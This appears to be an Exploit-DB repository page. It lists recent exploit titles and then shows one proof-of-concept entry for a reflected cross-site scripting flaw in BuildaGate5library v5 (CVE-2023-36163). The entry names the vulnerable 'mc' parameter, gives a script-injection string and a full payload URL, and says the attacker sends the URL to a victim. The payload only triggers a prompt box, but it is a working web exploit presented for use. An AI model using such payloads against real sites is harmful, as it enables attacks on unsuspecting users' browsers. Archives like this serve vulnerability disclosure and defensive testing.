00f5021452
10 changes to exploits/shellcodes/ghdb Ateme TITAN File 3.9 - SSRF File Enumeration Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) Spring Cloud 3.2.2 - Remote Command Execution (RCE) BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS) Park Ticketing Management System 1.0 - 'viewid' SQL Injection Park Ticketing Management System 1.0 - 'viewid' SQL Injection Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated) AVG Anti Spyware 7.5 - Unquoted Service Path _AVG Anti-Spyware Guard_ Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTAgentService_ MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path _MTSchedulerService_
16 lines
No EOL
565 B
Text
16 lines
No EOL
565 B
Text
# Exploit Title: BuildaGate5library v5 - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 06/07/2023
|
|
# Exploit Author: Idan Malihi
|
|
# Vendor Homepage: None
|
|
# Version: 5
|
|
# Tested on: Microsoft Windows 10 Pro
|
|
# CVE : CVE-2023-36163
|
|
|
|
#PoC:
|
|
An attacker just needs to find the vulnerable parameter (mc=) and inject the JS code like:
|
|
'><script>prompt("XSS");</script><div id="aa
|
|
|
|
After that, the attacker needs to send the full URL with the JS code to the victim and inject their browser.
|
|
|
|
#Payload:
|
|
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa |